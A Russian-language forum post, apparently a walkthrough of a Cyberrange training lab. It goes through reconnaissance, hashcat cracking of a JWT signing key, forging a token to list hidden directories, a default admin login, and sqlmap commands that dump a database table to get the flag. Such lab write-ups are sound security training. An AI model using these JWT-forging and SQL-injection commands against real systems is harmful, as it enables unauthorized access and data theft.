![]() |
Cyberrange Задание: Bootcamp
1 Разведка nmap 2 Подготовка атаки 3 Перебор Jwt 4 Сharge token 5 Атака sql Разведка nmap Код: Код:
PORT STATE SERVICE VERSIONПри входе на сайт мы видим следующую картину. https://forum.antichat.xyz/attachmen...6254484894.png Запрос Код:
GET /token.php?Get+Test+token=Submit+QueryToken : eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiS mFtZXMiLCJkaXIiOiJzYW1wbGVzIiwia2V5IjoicXdlcnR5Iiw idGltZXN0YW1wIjoxNzI0NTA3NTgwfQ.FGGagK9YlY2EHX52Sf _leBZ1HsneN9NREYcOGXZY2iw Далее предлагаю вам ознакомиться с вот этим сайтом h ttps://jwt.io/ или h ttps://edgecenter.ru/dev-tools/decode-jwt используем и видим Изучив Рисунок 1 видим HS256 уже знаем что это слабый алгоритм шифрования(скорее всего его нужно будет ломать ) ➡ Как мы знаем один из стандартных способ узнать что то на сайт это перебор каталогов , в данном случае он нам даёт страничку http://10.124.1.239/check.php ответ следующий : Код:
Get param 'jwt' is not setУказываем его через Код:
?jwt=https://forum.antichat.xyz/attachmen...6254597716.png Из действий выше, логично предположить , что у нас есть Jwt в который вшит параметр dir, если мы сможем его поменять то мы увидим новые директории. Перебор Jwt Способ 1 Внимание на размер, качаем и Weakpass нужно подождать ... раз архивации следующей командой gunzip HashesOrg.gz начинаем атаку(учитывайте расположение файлов ) {jwt.txt указать Jwt в файле без изменений } hashcat -a 0 -m 16500 jwt.txt ~/Downloads/HashesOrg https://forum.antichat.xyz/attachmen...6254627123.png Итог: 2e025(пароль для тех у кого слабый пк ) 2 способ взлома Код:
hashcat -a 3 -m 16500 /home/kali/Desktop/Document/ffuz_txt/jwt.txt ?a?a?a?a?a?a?a -i --increment-min=4Сharge token Наш токен eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiS mFtZXMiLCJkaXIiOiJzYW1wbGVzIiwia2V5IjoicXdlcnR5Iiw idGltZXN0YW1wIjoxNzI2MDQxMTEzfQ.8HexxHT5cLuhRVaUpC u7N-YML0zfHkUkCWrcYMs-MPM Далее имея ключ мы можем поменять данные в нашем token. либо полный путь как на скине /var/www/html или указать ./ Обе команды покажут нам директории сайта, где находятся файлы https://forum.antichat.xyz/attachmen...6254679029.png Далее нужно указать наш новый токен Способ1 указать ?jwt= в бюрпе https://forum.antichat.xyz/attachmen...6254701347.png Способ2 или просто на сайте в Url (таким же образом как на скрине) Видим супер Супер "бупер" скрытую директорию Переходим на данную ссылку и видим поля ввода пароля и логина ,( увидим формочку и вспомнив что в задании про sql я думал что тут ее и нужно тестить, НО ее тут нету) Вводим ручками admin admin и переходим на следующую страницу где видим новые поля Атака sql Я использовал sqlmap для выполнения этой задачи, но вы могли сделать это другим способом. Закидываем в файла pack http пакет из бюрпа и выполняем за комментированную команду так как мы указываем куки в пакете , то поэтому не нужно указывать логин и пароль , что вводили до этого , если делаете по другому то нужно будет указать их скорее всего* Код: Код:
┌──(kali㉿kali)-[~/htb]Код: Код:
sqlmap -r pack --level=5 --risk=3 --tables -D public --batch --random-agentищем колонку флаг Код: Код:
sqlmap -r pack --level=5 --risk=3 --columns -D public -T clients_data --batch --random-agentКод:
sqlmap -r pack --level=5 --risk=3 --dump -D public -T secret --batch --random-agentКод:
+----+--------------------------------------+ |
Если перед публикацией перечитывать статью и исправлять ошибки, то материал становится в разы интереснее.
|
Цитата:
|
Ок.
Начнем с этих: Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
|
Цитата:
|
Цитата:
|
|
Цитата:
|
| Время: 02:51 |